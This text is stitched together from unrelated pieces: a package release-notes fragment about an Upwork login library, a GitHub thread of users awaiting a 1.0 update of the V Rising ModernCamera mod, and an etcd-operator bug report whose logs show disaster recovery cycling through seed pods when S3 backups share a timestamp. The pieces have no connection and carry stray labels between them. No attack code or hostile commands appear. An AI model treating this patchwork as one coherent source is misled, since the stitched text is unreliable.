The project is made by Cyril Panshine (@CyrilPanshine). Bug reports and pull requests are very much welcomed!
Odesk rebranded to Upwork, now using python-upwork library.
Due to oDesk Public API change we need to get user information now from client.hr.get_user_me()
Implement bugfix for case when session is broken and request token and secret are not set.
Store first and last name in the session for further usage in templates
Login and Logout actions are performed via POST and has protection against CSRF attacks
Fix BaseHandler obscuring AttributeError during dispatch
Use override_offset for overriding forbidden.jinja2 template.
If user is authenticated but is not authrized for some view, render forbidden page with Log out link instead of redirect to avoid redirect loop
Release history Release notifications | RSS feed
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
|
OPCFW_CODE
|
1.0 update
Is there any plan to update it for version 1.0? I'm really hoping to use this mod again, it was a total game changer for me.
Thirded. Gameplay doesn't feel right without it.
Yes, please update this
Yes another plea for an updated version :)
Waiting an Update as well. This truely is THE best mod for V Rising, a must have!!
I agree with all above. The game just isn't as good without it.
I will be working on this, needed to wait until I got access to v1.0
I will be working on this, needed to wait until I got access to v1.0
Thank you so much! I really appreciate your work!
I will be working on this, needed to wait until I got access to v1.0
Thank you!
I will be working on this, needed to wait until I got access to v1.0
Absolutely amazing. Thank you so much!
Is it even possible to work on this now? When I try to launch with just BepInEx installed, it crashes.
Either way, very much look forward to the update, the game's unplayable without this as far as I'm concerned.
Would be wise for the devs to integrate this mod as a toggle camera lock option, great work, nice Qol, and provides great immersion.
Just checking to see how this was coming along. Very much appreciate the effort
please be patient, he is working diligently and hard on this update for all of us. if you go to the 'code' in github and see any activity on the files, that is when it will be working
the game now natively has controller support, the camera view wont effect that @IshlahulHanif
Thank you for the update
Can't wait for the update. Thank you for this mod.
I've been working on getting things updated, but there are still some issues with BepInEx that need to be resolved.
Controller support will likely NOT be included. I'm just trying to get it working again for now, then if I have time I will try to get controllers working.
I've been working on getting things updated, but there are still some issues with BepInEx that need to be resolved.
Controller support will likely NOT be included. I'm just trying to get it working again for now, then if I have time I will try to get controllers working.
We really appreciate you working on getting this updated. Thank you!
I've been working on getting things updated, but there are still some issues with BepInEx that need to be resolved.
Controller support will likely NOT be included. I'm just trying to get it working again for now, then if I have time I will try to get controllers working.
Thanks so much for keeping us in the loop. This is the only mod I use, and it completely changes the game for me. You're skill and efforts are very much appreciated
legends. all of you.
Hello there is any progress in the update or is an error from BenpIEx that id making you to wait. Otherwise thanks for keep this mod updated
I've been working on getting things updated, but there are still some issues with BepInEx that need to be resolved.
Just another THANK YOU for working on this mod again.
I've been working on getting things updated, but there are still some issues with BepInEx that need to be resolved.
Does this "Fix" of Odjit help with the BepInEx issue? Although I`m wondering, why there is no pullrequest in the original repo.
https://github.com/Odjit/BepInEx/releases/tag/vrising-release
I've been working on getting things updated, but there are still some issues with BepInEx that need to be resolved.
Does this "Fix" of Odjit help with the BepInEx issue? Although I`m wondering, why there is no pullrequest in the original repo.
https://github.com/Odjit/BepInEx/releases/tag/vrising-release
They were able to find a fix an issue with BepInEx crashing on startup, and hide another issue to do with logging. But it does not fix the other issues causing some features in mods not to work right now, unfortunately.
The game is unplayable without this mod.
https://github.com/decaprime/VRising-Modding/releases/tag/1.690.2 and this one for BeplnEx
I will be working on this, needed to wait until I got access to v1.0
Thank you so much for doing this. Modern Camera really raised the bar in V Rising. Cant wait
https://github.com/decaprime/VRising-Modding/releases/tag/1.690.2 and this one for BeplnEx
I know, I was involved in fixing it. Now I can update things that were not working before due to BepInEx being broken.
https://github.com/decaprime/VRising-Modding/releases/tag/1.690.2 and this one for BeplnEx
I know, I was involved in fixing it. Now I can update things that were not working before due to BepInEx being broken.
I wish I could help in some way but Im not skilled enough yet with coding... Still teaching myself.
Someone in one of the above comments mentioned that their friends refuse to play without that mod. I have friends with the very same sentiments.
But really thanks again and no rush, we appreciate you
When can we expect the new update?
It's impolite to ask for an ETA. It will be ready when it's ready.
Thanks for your efforts in developing the update and fix for BepInEx, @iZastic.
Thanks for your efforts xx
Well it's been a rollercoaster of a ride --- I almost couldn't bear to play V Rising because of the inability to look up and actually, I dunno, SEE the castle I spent all this time building... then I discovered your mod, and the (only slightly anemic) peasants rejoiced! ... then I saw the line of people awaiting an update. So here I am! Thank you so much for your work on what, in my opinion, is the single greatest flaw in this otherwise fantastic game!
I was seriously hoping the developer would adept the mod to make it an ingame option...
It just baffles me how such a feature can make or break the game... well... at least in my case.
I can´t wait for the mod to work again and i´m so very happy you´re still working on it. thank you very very much
Also in the waiting line. Thank you for your efforts.
bump
For those who want updates, join the v-rising modding discord (https://discord.gg/d96cWdhj) and in any chat, enter "~update". You will get the most up to date update without bothering the dev here
This is the latest post on the discord:
1.0 Update Status
Updated 4 days ago - Release Candidate #2
BepInEx and all mods needed updates after 1.0.
We have a second release candidate (RC2) for BepInEx and some mods in testing.
Mod developers: update your mods, provide feedback, and report critical issues here.
Packages for developers and testers are available on [the wiki](https://wiki.vrisingmods.com/user/game_update).
Subscribe to
announcements for Thunderstore release notification.
Thanks for your support! No ETA for ModernCamera.
Yes ill update this weekend
Mod is dead.
Is it still impolite to ask for an ETA? I just want to make sure this beautiful mod doesn't die before either a functional 1.0 version is released or everybody stops playing the game. Been waiting over 5 months to play 1.0 with this and I'm getting a bit antsy.
Is it still impolite to ask for an ETA? I just want to make sure this beautiful mod doesn't die before either a functional 1.0 version is released or everybody stops playing the game. Been waiting over 5 months to play 1.0 with this and I'm getting a bit antsy.
Try the fork at https://github.com/aequis/ModernCamera, it works for me so far, but still without config menu. Use "." to switch action mode. Beware it's work in progress, not sure if it is still being developed.
|
GITHUB_ARCHIVE
|
In Part 4, we have seen how can do Edit and delete customer. In this Part 5, we will just change the look and feel of our Modal window.
Before CSS Applied:
We will update only style.css file and make the reference of this file in CustomerCRUD.zul
Here is the modified Style.css file. Please note, here I am just changed the look and feel of ZK Message box also. In order to see this effect, in the list, click delete button.
Here is the modified CustomerCRUD.zul
Now you can run customerList.zul file and see the effect of CSS.
If you examine CustomerCRUD.zul file very closely, you can see I have used sclass for all the ZK Components. Using sclass, you can fine tune the components look and feel. For further understanding, please read here.
We can also extend ZK Component and create our own implementation of the component. Say for example, look at the following line in CustomerCRUD.Zul file
<button id="submit" label="Submit" mold="trendy"
sclass="mybutton orange small bigrounded"
In order show the button in different style, we should always use two properties such as “mold” and “sclass”. How about this,
<fbutton id="submit" label="Submit"
Now you can see that, I have removed that two properties and also changed the button to fbutton. What does this mean. ? Nothing, we will extend default ZK Button and we will always add this property in that class. Let us see how we can do this. Before this, I would recommend to read this chapter in zk documentation
Let us add language definition file. You can keep any name. In this example, let me keep as “myaddon.xml” and we will create this file in the Webcontent folder. As a first step, we will add our CSS File in this file. By doing this, we no need to add the reference of the CSS File in each file. i.e it is global now.
<?xml version="1.0" encoding="UTF-8"?>
<stylesheet href="/css/style.css" type="text/css" />
We need to ZK that we have added our language definition file. This can be done in zk.xml file. Expand the Web-inf folder and you can see zk.xml file as shown here
Double click zk.xml file and add the following line
Now remove the following line in CustomerList.zul file and run it
<style src="css/style.css" />
Now we can extend zk button and create our button. Add the following lines into myaddon.xml
Now we can use our own button in all the zul files. Let me remove all sclass properties and use our component as shown here.
You can download the source code here.
|
OPCFW_CODE
|
#include "voxigen/simpleCamera.h"
#define GLM_ENABLE_EXPERIMENTAL
#include <glm/gtc/matrix_transform.hpp>
#include <glm/gtx/quaternion.hpp>
namespace voxigen
{
void Position::move(const glm::vec3 &delta)
{
m_position+=delta;
}
SimpleFpsCamera::SimpleFpsCamera(glm::vec3 position, glm::vec3 direction):
m_projectionDirty(true),
m_viewDirty(true),
m_fov(glm::radians(60.0f)),
m_near(0.1f),
m_far(10000.0f),
m_width(640),
m_height(480),
m_worldUp(0.0f, 0.0f, 1.0f)
{
}
SimpleFpsCamera::~SimpleFpsCamera()
{}
void SimpleFpsCamera::forceUpdate()
{
m_projectionDirty=true;
m_viewDirty=true;
}
void SimpleFpsCamera::setFov(float fov)
{
m_fov=fov;
m_projectionDirty=true;
}
void SimpleFpsCamera::setClipping(float localNear, float localFar)
{
m_near=localNear;
m_far=localFar;
m_projectionDirty=true;
}
void SimpleFpsCamera::setView(size_t width, size_t height)
{
m_width=width;
m_height=height;
m_projectionDirty=true;
}
void SimpleFpsCamera::setYaw(float angle)
{
m_yaw=angle;
if(m_yaw<0.0)
m_yaw+=glm::two_pi<float>();
else if(m_yaw>glm::two_pi<float>())
m_yaw-=glm::two_pi<float>();
m_viewDirty=true;
}
void SimpleFpsCamera::setPitch(float angle)
{
m_pitch=angle;
// if(m_pitch<0.0)
// m_pitch+=glm::two_pi<float>();
// else if(m_pitch>glm::two_pi<float>())
// m_pitch-=glm::two_pi<float>();
m_viewDirty=true;
}
void SimpleFpsCamera::moveDirection(const glm::vec3 &velocity, glm::vec3 &delta)
{
glm::vec3 direction=getDirection();
glm::vec3 right=glm::normalize(glm::cross(direction, m_worldUp));
delta=(direction*velocity.x)+(right*velocity.y)+(m_worldUp*velocity.z);
m_position+=delta;
m_viewDirty=true;
}
glm::vec3 SimpleFpsCamera::getDirection()
{
glm::vec3 direction;
float r=cos(m_pitch);
direction.x=r*cos(m_yaw);
direction.y=r*sin(m_yaw);
direction.z=sin(m_pitch);
direction=glm::normalize(direction);
return direction;
}
void SimpleFpsCamera::setDirection(const glm::vec3 &direction)
{
m_yaw=atan(direction.y/direction.x);
m_pitch=asin(direction.z);
m_viewDirty=true;
}
void SimpleFpsCamera::updateMatrix()
{
bool dirty=false;
if(m_projectionDirty)
{
m_projectionDirty=false;
float ratio=(float)m_width/m_height;
m_projectionMatrix=glm::perspective(m_fov, ratio, m_near, m_far);
dirty=true;
}
if(m_viewDirty)
{
m_viewDirty=false;
glm::vec3 direction=getDirection();
m_viewMatrix=glm::lookAt(m_position, m_position+direction, m_worldUp);
dirty=true;
}
if(dirty)
m_projectionViewMatrix=m_projectionMatrix*m_viewMatrix;
}
}//namespace voxigen
|
STACK_EDU
|
I'm trying to develop a strategy and an EA based on the Dynamic Stochastic indicator. May be it already exist but it is a learning experiment. I'm not interested on how profitable it is, I'm just learning MQ4. Well, testing my EA I noticed a strange behavior that I would like to understand. Let me explain what happens.
The Dynamic Stochastic uses the BollingerBands, calculated on the Main indicator line, to get the oversold/overbougt levels (instead of usuals 20/80 - 30/70 level) and uses the median line instead of 50 level. The external parameters are K% Period, D% period, Smoothing, BB period, Deviation.
At Start(), my EA uses the iCustom function to call the DS, passing all 5 parameters, in order to get Main Stoch, Median BB, UpBB, DnBB values.
The parameters values have been defined as #external to allow optimization and have been inizialized at the default values of Dynamic Stochastic indicators.
The EA calculates the buy/sell signals only at candle close, so I tested my EA (without optimization, leaving the default parameter values, just to test the buy/sell signals) using the "Open price only" model on a short period (2 months) and I got, let say, 52 trades.
At the same time I noticed that, for each single call at iCustom call, the Journal reported "Custom indicator Dynamic Stochastic USDCHF, H1: Loaded succesfully" and immediately next "Custom indicator Dynamic Stochastic USDCHF, H1: Removed". The tester was very slooooooow.
Because some other EAs that I looked at, using the iCustom in the same way, were faster and were not showing any message, I decided to call the iCustom without the 5 parameters. This time (same Symbol, same Model, same timeframe) the Strategy tester was fast and was not showing any message in the Journal tab. Unfortunately, the number of trades was MORE THAN DOUBLE compared with the previous test.
Is it normal? How is it possible? The EA calculates the signals in the same way (starting of a new candle), and the number of candles (same starting/end date testing period, same timeframe) is exactly the same.
In theory, I should have the SAME NUMBER of trades. The first time I was PASSING the default indicator parameters, the second time I was USING the default indicator parameters. Were is the difference? I could accept that passing the parameters involves more CPU time and, for this reason, the tester is slow, but it seems that the indicator calculation produces different results and so different number of trades.
Have you ever noticed such a behavior? What I'm doing wrong? Any suggestion/tip is welcome.
|
OPCFW_CODE
|
Job Title: Business Intelligence Developer (Cloud Services)
Job Category: IT & Technical
Contract Type: Full-time
Deloitte is creating a new Cloud Operations Team in Cardiff to support a wide range of offerings on cloud platforms. A core function, the team will play a pivotal role in supporting the wider North West Europe cloud strategy to deliver quality cloud services across this region.
Cardiff is one of Deloitte’s hubs for supporting services so we are looking for talented individuals that seek to make an impact. In return you will be given the opportunity to showcase your talent, be fully supported in an ever changing world of technology and have the opportunity to work and travel across EMEA.
Deloitte’s Internal IT Services is looking for Business Intelligence Developers who are passionate about data and service optimization at scale in cloud platforms such as AWS. You will have a background in the design, development and optimization of a team’s operation from a BI / MI perspective.
Your role will drive our continual service improvement and operations strategy by exposing and reporting on insightful data analysis. Your BI strategy will ensure that we provide the best service to our clients.
In this role you will help make data relevant to the Cloud on current and historical performance, and visualize the key opportunities for growth and improvement. Using your technical skills, you will build tools to automate reporting and dashboard updates so drive key incentives and monitor how accurately our function is performing. You’ll be involved in defining user requirements, building and maintaining the data infrastructure, designing reports and ensuring timely delivery to the end users.
Your work, your choice
How long does impact take? How long is a piece of string? How many seconds does a solution contain? How can we possibly tell? After all, impact can be huge or small. Immediate or years in the making. At Deloitte we believe the best impact is the value we add, not the hours we sit at our desk.
We, therefore, carefully consider agile ways of working, both formal and informal, that allow for the best impact for our people and our clients. If the working pattern you are looking for is not specifically indicated below, we are happy to discuss alternative arrangements.
Your professional experience
– Build reports, dashboards, models and tools to analyze, report, and present operations related data that is associated with customer pipeline, product usage, bookings forecasting and business productivity.
– Provide insights to the function through analysis of demand, activity and product data to drive greater efficiency and effectiveness of our teams.
– Develop Business Intelligence, Data Warehousing and Reporting solutions to address growing business reporting, analytics and data requirements.
– Support engagement activities to analyse business environments, gather business requirements and create data visualizations in support of work product.
Experience in the following is desirable:
– Coding experience in Java and/or Python.
– Experience with SQL and Visualization tools.
– Deep understanding of metrics and KPIs and how to use them to guide a business.
– Ability to conduct back-end and data processing work necessary to power UIs.
– Interest in user interface design and data visualization front-end architecture and implementation experience.
– Excellent analytical and problem solving skills, combined with strong business judgement and an ability to present analysis in a clear and compelling manner
Applying For The Job
Apply direct for the job by clicking here
|
OPCFW_CODE
|
Select2 is a jQuery plugin that can be used as a replacement for standard select boxes. It has support for remote data sets, pagination, and infinite scrolling of results. The plugin was initially released in 2012 as an alternative to Chosen that supported remote data sets and has since evolved into a flexible plugin that is configurable using a long list of options.
It has somehow managed to do this without having any clear contributing guidelines, test suite, or even additional maintainers (until I showed up, at least). At lot has changed during that time, though the core of the code base has remained relatively stable and still resembles much of what it started with, even after 240+ hands have been involved in the mix. Starting with Select2 3.0.0, the versioning has been following semver and the major version has not moved at all, even as the code has become more flexible, allowing for Select2 to be used in ways that could have never been imagined. Now that nearly two years have passed since Select2 3.0.0 was released, and the code base is becoming more and more overwhelming to deal with, the opportunity has come to clean it up for a 4.0 release.
Select2 contains a lot of code that powers individual parts of the component, from the AJAX functionality to the multiple select support, most of which is typically not used in production. There has been some talk in the past about breaking Select2 up into different components, so users could only include what they needed (similar to larger frameworks such as Bootstrap), but the complexity of the code base combined with the close coupling of components has prevented this from becoming a reality. Much of what is included, such as mobile support, was added as more of an afterthought and is prone to breaking if care is not taken to constantly ensure it works.
Select2 maintains all of the documentation for a version within a single page, which has resulted in a page full of generalized examples with sparse documentation for the API and a minimal change log between versions. This has proven to be problematic, primarily because the documentation is not easy to navigate and often was not correct, containing many examples that demonstrated basic options that could be passed into Select2, but was missing some of the more complex but common examples.
There have been attempts to bring testing into the code base, but much of the issue revolved around getting a test runner set up and a few basic tests created. Because Select2 was so tightly coupled, it was difficult to isolate individual components and never became a reality.
Select2 contains all of the code base within a single directory, making it easy to find the required files, but difficult for those who use package managers such as Bower to download their files. There have been many requests to move the files into other separate directories, but this would require a breaking release, and as a result it was always pushed off to Select2 4.0.
Select2 4.0 will be a large refactoring of the current code base in an attempt to make it easier to maintain in the future, as well as opening the doors to other things such as unit testing and splitting the code into modules. It also splits up the code base to make it easier to hook into, so users will not longer have to modify the core code in order to get things to work exactly how they want it to.
GruntJS was chosen because of the wide popularity and extensive support for other plugins that has been added by the community. While other task runners such as GulpJS were considered, the lack of support for plugins which were going to be used proved to be a problem which could not be tackled, resulting in GruntJS being chosen in the end.
Instead of being contained on a single page, the documentation will now be organized across multiple pages. This will allow for more complex examples with more detailed explanations, as well as additional pages such as a contributing guide and more detailed change log.
The documentation will also be stored within the main repository and will be cloned to the GitHub Pages branch by a script, so it will be easier to keep the documentation more up to date. This will also allow the documentation to be versioned, so previous versions of the documentation will still be available through the documentation website.
QUnit, the unit test framework used by jQuery, was selected as the framework that will run the tests for Select2. While other test runners exist, QUnit was selected because it was easy to create tests using and could be run from within a browser, making it easy to test the cross-browser compatibility within Select2. It can also be run within within Grunt, allowing tests to be run by Travis CI for pull requests and other commits to the code base.
For the most part, you will not have to change your style when writing code in
the CoffeeScript compiler will work without them. There are a few exceptions,
such as the
in operator (use
of instead), but these are not used that often
and the compiled code will show the problem if the compiler does not point it
out. Conditionals which require braces will also fail to compile, as
CoffeeScript uses different levels of indentation to signal different blocks of
SASS is a CSS preprocessor that allows Select2 to split up the CSS files and include them within the distributed build as a single file. This also allows the CSS to be written with variables, so most options for Select2 are now configurable for those who are interested in compiling their own files. Previously, Select2 was restricted to a neutral color scheme, but this opens the door to custom color schemes that can match whatever environment Select2 is used in.
It has been requested in the past for AMD and RequireJS support to be added to Select2, and for one reason or another it never actually happened. Select2 4.0 is written entirely using AMD and includes Almond as a basic AMD loader, so users who do not already use AMD will be able to still use Select2. The distributed versions will be automatically compiled using r.js and will include all of the required modules, with optional versions that will not include the AMD loader or will include all of the possible modules.
This opens the door to custom builds in the future, for those who only need Select2 for specific cases such as only single selects or not needing support for AJAX data. A separate blog post will be created about how Select2 uses AMD and the challenges that were faced when setting it up.
The goal for Select2 4.0 is to maintain backwards compatibility transparently with past versions of Select2, down to Select2 3.0. With 45 individual options that can be passed to Select2 when initializing the widget, this goal may not actually be possible but we will try our best. The most commonly used options, such as the formatters and different data sources will be implemented, though they may have to be included as separate modules not included in the main build.
Translations will no longer be loaded by just including the translation file below Select2 in the page. A translations module will be included in the same form as the default options, and translations will be able to be loaded asynchronously and applied when needed. They will also no longer be done using formatters, but instead will work on basic strings (with parameters) similar to gettext works for other languages, and those strings will be used by the default formatters.
English will still remain as the default language for Select2, though the translation files created by contributors will be migrated to the new format. Custom translations (those not provided by Select2) will need to be migrated over on their own, and instructions will be provided in the Select2 migration guide that will be created.
|
OPCFW_CODE
|
[Tutor] How does this work?
rabidpoobear at gmail.com
Wed Feb 7 19:06:11 CET 2007
Tony Cappellini wrote:
>> If I understand you, you have a python cmdline app that does something
>> useful. You have users who aren't comfortable with the command line, so
>> you are writing a GUI wrapper that calls the cmdline app with popen().
> That is correct
>> A better approach is to turn the functional part of the cmdline app -
>> the code that does the real work - into an importable module.
> it already is importable
>>> Then your GUI app can import and use this module directly, instead
> of doing hacks
>> with popen() and stdout.
> This all worked fine, until the author of the cmd line app stopped
> using stdout and started using the logging module. Now I cannot
> capture any output from his module.
>> You don't even need a separate module for the cmdline app if it is
>> written correctly - the command-line-specific part can be in an main()
>> function that is only called if the module is run as main.
> not totally true. It must be a stand-alone app, because there are
> people using it now and many don't want to use the gui.
> It is maintained completely independent of the gui by people other
> than myself.. Any changes in the cmdline app should not affect the
> gui. That was the intent by the author anyway. The use of the logging
> module happens to be an exception to this.
The application needs to be rewritten if this is true. The author's
implementation is not logical,
if I'm inferring correctly that he knows there are other apps depending
print "we're creating a new Foo and doing something useful here."
if __name__ == "__main__":
f = Foo()
#we can do stuff with our Foo instance here.
Notice that if this program is run as a regular script -- not imported
-- we create a Foo and we can use it for whatever.
All the functionality of the cmdline app is contained in the Foo class.
All that we have to do is propagate our data into it.
Now if we want to write a GUI for this, we just import this script, and
use the Foo object to do whatever we were doing in the
cmdline version -- no separate processes, threads, or any of that nastiness.
Because it's imported, the contents of the 'if __name__...' conditional
statement are never executed, so the cmdline functionality is disabled.
Hope that helps,
> Using popen() in a thread was a nice clean way to capture it's output.
> Perhaps the exec/eval isn't so clean it's just what first came to mind.
> I've already switched the exec/eval code to the import style.
> Tutor maillist - Tutor at python.org
More information about the Tutor
|
OPCFW_CODE
|
Among COVID-19 fatalities in the US, minorities are overrepresented (Yancy 2020) while women are underrepresented (Peckam et al. 2020). By looking at the intersection between race and gender, we uncover a Black female bias: while Black men are affected as much as White men, Black women are more affected than White women, and this is due to their lower socioeconomic status. The first and most harshly hit by the pandemic were Black women employed as frontline workers who commute on public transport from historically redlined blocks.
In a new paper (Bertocchi and Dimico 2021), we take advantage of extraordinarily detailed individual-level and georeferenced data on US daily deaths from COVID-19 and other causes provided by the Medical Examiner's Officer of Cook County, Illinois, the county that includes the metropolitan area of Chicago. The information includes race and ethnicity among a wide array of other individual characteristics such as gender, age, pre-existing conditions, and georeferenced home address. The present analysis is based on data up to 15 September 2020, covering the first wave of the epidemic in Cook County. Figure 1 shows the spatial distribution of COVID-19 deaths recorded since 16 March 2020, the day the first COVID-19 death was recorded. We superimpose on the map the boundaries of Census block groups.
Figure 1 COVID-19 deaths in Cook County, 16 March to 15 September 2020
We combine death data with US Census data on occupation by sector, public transport use, household crowding, and access to health insurance – down to the block group level of disaggregation. Since the county comprises almost 4,000 block groups, this represents a major advantage compared to other analyses of the racially differentiated impact of the pandemic (Almagro and Orane-Hutchinson 2020, McLaren 2020) that have been conducted at a state, county or, at best, ZIP code level (there are only 164 for Cook County). The resulting unique dataset allows us to jointly investigate the racial and gendered impact of COVID-19, its timing, its determinants, and its geography.
The Black female bias
Our dataset allows us to focus on the potential intersection between race and other demographic characteristics, notably gender. Preliminary correlational evidence suggests that, even after controlling for age and comorbidities, the probability of dying from COVID-19 has been particularly high for Black women, while Black men were not significantly more likely to die from the disease than White men.
To establish our main results, we employ information on all deaths (from COVID-19 and any other cause reported by the Medical Examiner) recorded from 1 January to 15 September in 2020 and 2019 and construct a cell-level panel, with cells aggregated at a race, census block group, week, and year level. The main outcome of interest is a measure of excess deaths for each race in a given block group and week in 2020, relative to the same race, block group, and week in 2019. Using an event study approach, we capture differential trends in deaths between years, pre-and post-COVID-19 weeks, and races. In Figure 2, we compare these differential trends for women and men.
Figure 2 Sex-disaggregated excess deaths for Blacks and Whites and Black-White excess death differential
Note: The plots report coefficients for fixed-effect regressions where the dependent variables are excess deaths for Blacks and Whites, by sex (females in top left panel, males in top right panel) and the Black-White differential in excess deaths, by sex (females in bottom left panel, males in bottom right panel). Vertical lines represent 95 percent confidence intervals. Data refers to deaths from any cause reported between 1 January and 15 September 2020 and 2019. Event time 0 corresponds to the week of 11 March.
The top two panels of Figure 2 show that excess deaths are near zero, as expected, in the weeks that precede the start of the epidemic. They shoot up in the second half of March 2020, when the epidemic starts, and are more numerous for males independently of race. However, we also observe that Black females outnumber White females (top left panel), while among males racial differences are much less pronounced (top right).
The bottom two panels confirm that the racial differential in excess deaths is larger and more prolonged for females (bottom left). This means that the racial disadvantage is largely attributable to Black females, who are hit by the epidemic earlier and more severely. In other words, a male bias is present only within the White population while, strikingly, within the Black population we do not observe any significant sex-related differences. To quantify, in the critical week of 8 April 2020, the Black-White differential in excess deaths was 3 percentage points and was entirely driven by Black women.
What drives the Black female bias?
The emergence of a Black female bias exposes an interaction between race and sex that had been so far overlooked. What explains it? A comparison across block groups reveals that it is driven by those with a larger population share in poverty. Differences in poverty rates absorb differences in the shares of people aged 65+ and with pre-existing conditions. This suggests that socioeconomic disparities, rather than demographic and biological differences, lie at the heart of the higher vulnerability of Black women. But what is it, among socioeconomic disparities, that can channel higher viral transmission and mortality?
We look at four potential and not mutually exclusive channels: jobs, use of public transport, housing crowding, and health insurance coverage. The first and second reflect the risk of contracting the virus at the workplace and on the way to work; the third can magnify transmission rates within the household; and the last affects access to medical care once contagion has occurred.
In order to assess whether the higher risk of contracting the virus at the workplace can explain the Black female bias in deaths, we compute the share of women and men employed in 20 industries, at the block group level. Splitting the sample between block groups with above- and below-median shares shows that the Black women’s death differential is explained by female employment in two key frontline, high-exposure sectors: health care and transportation/warehousing. These are sectors where Black women are overrepresented and that pay lower wages (Bertocchi 2020, Ross and Bateman 2019). Other high-exposure, low-pay jobs, for example in restaurants, where again Black women are heavily represented, do not explain death differentials, likely because the shutdown of the food sector protected their health, despite massive layoffs (Albanesi and Kim 2021, Alon et al. 2020).
A second contributing channel is the intensity in using public transport, which we measure with the share of people using it and the length of commute to work (Caselli et al. 2020). By contrast, we find no explanatory power for housing crowding, the diffusion of multigenerational families, and even lack of health insurance. Lastly, using the georeferenced home address of the deceased, we overlay the map of fatalities onto the redlining maps created in the 1930s in order to assess mortgage default risk (Bertocchi and Dimico 2020). We find that the diminished resilience of Black women is geographically concentrated in formerly low-graded blocks, which uncovers a persistent influence of historical racial segregation.
Thanks to a unique source of data, we have established that the COVID-19 death toll in Cook County has been disproportionately imposed on Black women employed in high-exposure, frontline jobs in the health care and transportation sectors, that they reach by public transport from the historically poor neighbourhoods where they reside.
Since we deal with the second most populous US county, which contains the third largest metropolitan area in the country, our findings do carry wider relevance. They also underline the need for granular data combining COVID-19 outcomes by race and sex with socioeconomic information. It is only through such data that scientists can produce evidence capable of guiding effective policy responses, including prioritisation strategies for vaccination campaigns, even after the emergency is over.
Albanesi, S and J Kim (2021), “The gendered impact of the COVID-19 recession on the US labor market”, NBER Working Paper No. 28505.
Almagro M and A Orane-Hutchinson (2020), “The determinants of the differential exposure to COVID-19 in New York City and their evolution over time”, Covid Economics 13: 31–50.
Alon A, M Doepke, J Olmstead-Rumsey and M Tertilt (2020), “The shecession (she-recession) of 2020: Causes and consequences”, VoxEU.org, 22 September.
Bertocchi, G (2020), “COVID-19 susceptibility, women, and work”, VoxEU.org, 23 April.
Bertocchi, G and A Dimico (2021), “COVID-19, race, and gender”, CEPR Discussion Paper No. 16000.
Bertocchi, G and A Dimico (2020), “Race and the COVID-19 pandemic”, VoxEU.org, 29 July.
Caselli F G, F Grigoli, P Rente Lourenço, D Sandri and A Spilimbergo (2020), “The disproportionate impact of lockdowns on women and the young”, VoxEU.org, 15 January.
McLaren, J (2020), “Racial disparity in COVID-19 deaths: Seeking economic roots in census data”, VoxEU.org, 11 August.
Peckham, H, N M de Gruijter, C Raine et al. (2020), “Male sex identified by global COVID-19 meta-analysis as a risk factor for death and ITU admission”, Nature Communications 11: 6317.
Ross, M and N Bateman (2019), “Meet the low-wage workforce”, Brookings.
Yancy, C W (2020), “COVID-19 and African Americans”, Journal of the American Medical Association, Opinion, 15 April.
|
OPCFW_CODE
|
Disaster recovery from S3 fails when multiple backups with same timestamp
I copied our S3 backups folder from:
${BUCKET_NAME}/v1/${CLUSTER_NAME}/ to
${BUCKET_NAME}/v1/${NAMESPACE}/${CLUSTER_NAME}/
to enable restore from newer version of etcd-operator.
This caused all the backups S3 objects to have the same Last Modified timestamp, and until I deleted all but one of them, DR was cycling through seed pods over and over.
Here are etcd-operator logs from immediatly after kubectl applying the etcdCluster object:
time="2017-08-12T05:35:51Z" level=info msg="restoring cluster from existing backup (obfuscated)" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:35:51Z" level=info msg="backup sidecar deployment and service created" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:35:51Z" level=info msg="start running..." cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:35:56Z" level=info msg="apiserver closed watch stream, retrying after 5s..." pkg=controller
time="2017-08-12T05:35:59Z" level=warning msg="all etcd pods are dead. Trying to recover from a previous backup" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:35:59Z" level=info msg="cluster created with seed member (obfuscated-0000)" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:36:01Z" level=info msg="start watching at 471017" pkg=controller
time="2017-08-12T05:36:07Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0000])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:36:15Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0000])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:36:23Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0000])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:36:31Z" level=warning msg="all etcd pods are dead. Trying to recover from a previous backup" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:36:31Z" level=info msg="cluster created with seed member (obfuscated-0001)" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:36:39Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:36:47Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:36:55Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:03Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:11Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:19Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:27Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:35Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:43Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:51Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:56Z" level=info msg="apiserver closed watch stream, retrying after 5s..." pkg=controller
time="2017-08-12T05:37:59Z" level=info msg="Start reconciling" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:59Z" level=info msg="running members: obfuscated-0001" cluster-name=obfuscated pkg=cluster
